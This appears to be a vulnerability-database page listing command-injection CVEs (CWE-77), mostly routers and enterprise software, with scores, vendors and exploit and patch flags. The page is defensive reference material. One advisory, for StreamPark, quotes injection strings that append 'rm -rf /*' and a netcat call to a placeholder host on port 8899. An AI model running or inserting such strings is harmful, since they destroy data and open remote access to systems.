Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-77

CVE IDCVSSVendorExploitPatchTrends
CVE-2023-51887Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-51835An issue in TRENDnet TEW-822DRE v.1.03B02 allows a local attacker to execute arbitrary code via the parameters ipv4_ping in the /boafrm/formSystemCheck.
CVSS 6.8Trendnet

-

-

Trending graph for this CVE
CVE-2023-51833A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page.
CVSS 8.1Trendnet

Exploit

-

Trending graph for this CVE
CVE-2023-51707MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected.
CVSS 9.8Arraynetworks

-

Patched

Trending graph for this CVE
CVE-2023-51664tj-actions/changed-files is a Github action to retrieve all files and directories. Prior to 41.0.0, the `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. This issue may lead to arbitrary command execution in the GitHub Runner. This vulnerability has been addressed in version 41.0.0. Users are advised to upgrade.
CVSS 7.3Tj-actions

Exploit

Patched

Trending graph for this CVE
CVE-2023-51126Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.
CVSS 9.8Flir

Exploit

-

Trending graph for this CVE
CVE-2023-51025TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi .cgi.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-51016TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi .cgi.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-51014TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter’ of the setLanConfig interface of the cstecgi .cgi
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-50989Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-50983Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-50917MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
CVSS 9.8Mjdm

Exploit

Patched

Trending graph for this CVE
CVE-2023-50447Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).
CVSS 8.1Tenable, et al

Exploit

Patched

Trending graph for this CVE
CVE-2023-50445Shell Injection vulnerability GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7., allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module.
CVSS 7.8Gl-inet

Exploit

-

Trending graph for this CVE
CVE-2023-50274This vulnerability allows local attackers to escalate privileges code on affected installations of Hewlett Packard Enterprise OneView. An attacker must first obtain the ability to execute low-privileged code on the target system or send an HTTP request to a local service in order to exploit this vulnerability.<br/>The specific flaw exists within the startUpgradeCommon method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.<br/> Hewlett Packard Enterprise has issued an update to correct this vulnerability. More details can be found at: <br/><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04586en_us&amp;docLocale=en_US">https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04586en_us&amp;docLocale=en_US</a> <br/></td>
CVSS 7.8Hp

Exploit

Patched

Trending graph for this CVE
CVE-2023-50089A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.
CVSS 9.8Netgear

Exploit

Patched

Trending graph for this CVE
CVE-2023-49959In Indo-Sol PROFINET-INspektor NT through 2.4.0, a command injection vulnerability in the gedtupdater service of the firmware allows remote attackers to execute arbitrary system commands with root privileges via a crafted filename parameter in POST requests to the /api/updater/ctrl/start_update endpoint.
CVSS 9.8

-

-

Trending graph for this CVE
CVE-2023-49898In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
CVSS 7.2Apache

-

Patched

Trending graph for this CVE
CVE-2023-49716 In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an authenticated user with network access could run arbitrary commands from a remote computer.
CVSS 9.8Emerson

-

Patched

Trending graph for this CVE
CVE-2023-49587SAP Solution Manager - version 720, allows an authorized attacker to execute certain deprecated function modules which can read or modify data of same or other component without user interaction over the network.
CVSS 6.4Sap

-

Patched

Trending graph for this CVE
CVE-2023-4958In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user's account permissions to perform other actions.
CVSS 6.1Redhat

-

Patched

Trending graph for this CVE
CVE-2023-49437Tenda AX12 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'list' parameter at /goform/SetNetControlList.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-49436Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'list' parameter at /goform/SetNetControlList.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-49435Tenda AX9 V22.03.01.46 is vulnerable to command injection.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-49431Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-49428Tenda AX12 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-49237An issue was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Command injection can occur because the system function is used by davinci to unpack language packs without strict filtering of URL strings.
CVSS 9.8Trendnet

Exploit

Patched

Trending graph for this CVE
CVE-2023-49226An issue was discovered in Peplink Balance Two before 8.4.0. Command injection in the traceroute feature of the administration console allows users with admin privileges to execute arbitrary commands as root.
CVSS 7.2Peplink

Exploit

-

Trending graph for this CVE
CVE-2023-49213The API endpoints in Ironman PowerShell Universal 3.0.0 through 4.2.0 allow remote attackers to execute arbitrary commands via crafted HTTP requests if a param block is used, due to invalid sanitization of input strings. The fixed versions are 3.10.2, 4.1.10, and 4.2.1.
CVSS 8.8Ironmansoftware

Exploit

Patched

Trending graph for this CVE
CVE-2023-49210The openssl (aka node-openssl) NPM package through 2.0.0 was characterized as "a nonsense wrapper with no real purpose" by its author, and accepts an opts argument that contains a verb field (used for command execution). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
CVSS 9.8Node-openssl project

Exploit

Patched

Trending graph for this CVE
CVE-2023-49040An issue in Tneda AX1803 v.1.0.0.1 allows a remote attacker to execute arbitrary code via the adslPwd parameter in the form_fast_setting_internet_set function.
CVSS 9.8Tenda

Exploit

-

Trending graph for this CVE
CVE-2023-48842D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi.
CVSS 9.8Dlink

Exploit

-

Trending graph for this CVE
CVE-2023-48801In TOTOLINK X6000R_Firmware V9.4.0cu.852_B20230719, the shttpd file sub_415534 function obtains fields from the front-end, connects them through the snprintf function, and passes them to the CsteSystem function, resulting in a command execution vulnerability.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-48791An improper neutralization of special elements used in a command ('Command Injection') vulnerability [CWE-77] in FortiPortal version 7.2.0, version 7.0.6 and below may allow a remote authenticated attacker with at least R/W permission to execute unauthorized commands via specifically crafted arguments in the Schedule System Backup page field.
CVSS 8.8Fortinet

-

Patched

Trending graph for this CVE
CVE-2023-48702Jellyfin is a system for managing and streaming media. Prior to version 10.8.13, the `/System/MediaEncoder/Path` endpoint executes an arbitrary file using `ProcessStartInfo` via the `ValidateVersion` function. A malicious administrator can setup a network share and supply a UNC path to `/System/MediaEncoder/Path` which points to an executable on the network share, causing Jellyfin server to run the executable in the local context. The endpoint was removed in version 10.8.13.
CVSS 7.2Jellyfin

Exploit

Patched

Trending graph for this CVE
CVE-2023-4797The Newsletters WordPress plugin before 4.9.3 does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.
CVSS 7.2Tribulant

Exploit

-

Trending graph for this CVE
CVE-2023-47576An issue was discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface.
CVSS 8.8Relyum

-

Patched

Trending graph for this CVE
CVE-2023-47563An OS command injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: Video Station 5.8.2 and later
CVSS 8.8Synology, et al

-

Patched

Trending graph for this CVE
CVE-2023-47562An OS command injection vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: Photo Station 6.4.2 ( 2023/12/15 ) and later
CVSS 8.8Qnap

-

Patched

Trending graph for this CVE
CVE-2023-47560An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later
CVSS 8.8Qnap

-

Patched

Trending graph for this CVE
CVE-2023-47253Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-47218An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later
CVSS 5.8Qnap

Exploit

-

Trending graph for this CVE
CVE-2023-47104tinyfiledialogs (aka tiny file dialogs) before 3.15.0 allows shell metacharacters (such as a backquote or a dollar sign) in titles, messages, and other input data. NOTE: this issue exists because of an incomplete fix for CVE-2020-36767, which only considered single and double quote characters.
CVSS 9.8Vareille

Exploit

Patched

Trending graph for this CVE
CVE-2023-46993In TOTOLINK A3300R V17.0.0cu.557_B20221024 when dealing with setLedCfg request, there is no verification for the enable parameter, which can lead to command injection.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46979TOTOLINK X6000R V9.4.0cu.852_B20230719 was discovered to contain a command injection vulnerability via the enable parameter in the setLedCfg function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46976TOTOLINK A3300R 17.0.0cu.557_B20221024 contains a command injection via the file_name parameter in the UploadFirmwareFile function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46687 In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could execute arbitrary commands in root context from a remote computer.
CVSS 9.8Emerson

-

Patched

Trending graph for this CVE
CVE-2023-46574An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46485An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46484An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46424TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_422BD4 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46423TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_417094 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46422TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_411994 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46421TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_411D00 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46420TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_41590C function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46419TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_415730 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46418TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_412688 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46417TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_415498 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46416TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_ The 41A414 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46415TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_41E588 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46414TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a remote command execution (RCE) vulnerability via the sub_ 41D494 function.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-46413TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_4155DC function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-46412TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_41D998 function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-46411TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_415258 function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-46410TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_ The 416F60 function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-46409TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_ 41CC04 function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-46408TOTOLINK X6000R v9.4.0cu.652_B20230116 was discovered to contain a command execution vulnerability via the sub_ The 41DD80 function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-46370Tenda W18E V16.01.0.8(1576) has a command injection vulnerability via the hostName parameter in the formSetNetCheckTools function.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-45852In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-45625Multiple authenticated command injection vulnerabilities exist in the command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.
CVSS 7.2Arubanetworks, et al

-

Patched

Trending graph for this CVE
CVE-2023-45498VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain a command injection vulnerability.
CVSS 9.8Vinchin

Exploit

-

Trending graph for this CVE
CVE-2023-45466Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the pin_host parameter in the WPS Settings.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-45465Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the ddnsDomainName parameter in the Dynamic DNS settings.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-45356Atos Unify OpenScape 4000 Platform V10 R1 before Hotfix V10 R1.42.2 4000 and Manager Platform V10 R1 before Hotfix V10 R1.42.2 allow command injection by an authenticated attacker into the platform operating system, leading to administrative access, via dtb pages of the platform portal. This is also known as OSFOURK-23719.
CVSS 8.8Atos

-

Patched

Trending graph for this CVE
CVE-2023-45355Atos Unify OpenScape 4000 Platform V10 R1 before Hotfix V10 R1.42.2 and 4000 and Manager Platform V10 R1 before Hotfix V10 R1.42.2 allow command injection by an authenticated attacker into the platform operating system, leading to administrative access via the webservice. This is also known as OSFOURK-24120.
CVSS 8.8Atos

-

Patched

Trending graph for this CVE
CVE-2023-45351Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.1, 4000 Assistant V10 R0, 4000 Manager V10 R1 before V10 R1.42.1, and 4000 Manager V10 R0 allow Authenticated Command Injection via AShbr. This is also known as OSFOURK-24039.
CVSS 8.8Atos

-

Patched

Trending graph for this CVE
CVE-2023-45208A command injection in the parsing_xml_stasurvey function inside libcgifunc.so of the D-Link DAP-X1860 repeater 1.00 through 1.01b05-01 allows attackers (within range of the repeater) to run shell commands as root during the setup process of the repeater, via a crafted SSID. Also, network names containing single quotes (in the range of the repeater) can result in a denial of service.
CVSS 8.8

Exploit

-

Trending graph for this CVE
CVE-2023-45025An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.4.2596 build 20231128 and later QuTS hero h4.5.4.2626 build 20231225 and later QuTScloud c5.1.5.2651 and later
CVSS 9.8Qnap

-

Patched

Trending graph for this CVE
CVE-2023-44959An issue found in D-Link DSL-3782 v.1.03 and before allows remote authenticated users to execute arbitrary code as root via the Router IP Address fields of the network settings page.
CVSS 8.8Dlink

Exploit

-

Trending graph for this CVE
CVE-2023-44827An issue in ZenTao Community Edition v.18.6 and before, ZenTao Biz v.8.6 and before, ZenTao Max v.4.7 and before allows an attacker to execute arbitrary code via a crafted script to the Office Conversion Settings function.
CVSS 8.8Easycorp

Exploit

-

Trending graph for this CVE
CVE-2023-4414A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230807. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237517 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVSS 9.8Byzoro

Exploit

-

Trending graph for this CVE
CVE-2023-4401 Dell SmartFabric Storage Software v1.4 (and earlier) contains an OS Command Injection Vulnerability in the CLI use of the ‘more’ command. A local or remote authenticated attacker could potentially exploit this vulnerability, leading to the ability to gain root-level access.
CVSS 8.8Dell

-

Patched

Trending graph for this CVE
CVE-2023-43891Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability in the Changing Username and Password function. This vulnerability is exploited via a crafted payload.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-43510A vulnerability in the ClearPass Policy Manager web-based management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a non-privileged user on the underlying operating system leading to partial system compromise.
CVSS 6.3Arubanetworks

-

Patched

Trending graph for this CVE
CVE-2023-43477The ping_from parameter of ping_tracerte.cgi in the web UI of Telstra Smart Modem Gen 2 (Arcadyan LH1000), firmware versions < 0.18.15r, was not properly sanitized before being used in a system call, which could allow an authenticated attacker to achieve command injection as root on the device. 
CVSS 8.8

Exploit

-

Trending graph for this CVE
CVE-2023-43455An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the command parameter of the setting/setTracerouteCfg component.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-43454An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the hostName parameter of the switchOpMode component.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-43453An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the IP parameter of the setDiagnosisCfg component.
CVSS 9.8Totolink

Exploit

-

Trending graph for this CVE
CVE-2023-43322ZPE Systems, Inc Nodegrid OS v5.0.0 to v5.0.17, v5.2.0 to v5.2.19, v5.4.0 to v5.4.16, v5.6.0 to v5.6.13, v5.8.0 to v5.8.10, and v5.10.0 to v5.10.3 was discovered to contain a command injection vulnerability via the endpoint /v1/system/toolkit/files/.
CVSS 8.8Zpesystems

-

Patched

Trending graph for this CVE
CVE-2023-43207D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function config_upload_handler. This vulnerability allows attackers to execute arbitrary commands via the configRestore parameter.
CVSS 9.8Dlink

Exploit

-

Trending graph for this CVE
CVE-2023-43206D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function web_cert_download_handler. This vulnerability allows attackers to execute arbitrary commands via the certDownload parameter.
CVSS 9.8Dlink

Exploit

-

Trending graph for this CVE
CVE-2023-43204D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function sub_2EF50. This vulnerability allows attackers to execute arbitrary commands via the manual-time-string parameter.
CVSS 9.8Dlink

Exploit

-

Trending graph for this CVE
CVE-2023-43202D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function pcap_download_handler. This vulnerability allows attackers to execute arbitrary commands via the update.device.packet-capture.tftp-file-name parameter.
CVSS 9.8Dlink

Exploit

-

Trending graph for this CVE
CVE-2023-43138TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds NAPT rules after authentication, and the rule name has an injection point.
CVSS 8.8

Exploit

-

Trending graph for this CVE
CVE-2023-43137TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds ACL rules after authentication, and the rule name parameter has injection points.
CVSS 8.8

Exploit

-

Trending graph for this CVE
CVE-2023-43128D-LINK DIR-806 1200M11AC wireless router DIR806A1_FW100CNb11 is vulnerable to command injection due to lax filtering of HTTP_ST parameters.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2023-4310BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) versions 23.2.1 and 23.2.2 contain a command injection vulnerability which can be exploited through a malicious HTTP request. Successful exploitation of this vulnerability can allow an unauthenticated remote attacker to execute underlying operating system commands within the context of the site user. This issue is fixed in version 23.2.3.
CVSS 9.8Beyondtrust

-

Patched

Trending graph for this CVE
CVE-2023-42810systeminformation is a System Information Library for Node.JS. Versions 5.0.0 through 5.21.6 have a SSID Command Injection Vulnerability. The problem was fixed with a parameter check in version 5.21.7. As a workaround, check or sanitize parameter strings that are passed to `wifiConnections()`, `wifiNetworks()` (string only).
CVSS 9.8Systeminformation

-

Patched

Trending graph for this CVE
CVE-2023-42326An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.
CVSS 8.8Netgate

-

Patched

Trending graph for this CVE
CVE-2023-42136PAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow the execution of arbitrary commands with system account privilege by shell injection starting with a specific word. The attacker must have shell access to the device in order to exploit this vulnerability.
CVSS 7.8Paxtechnology

Exploit

-

Trending graph for this CVE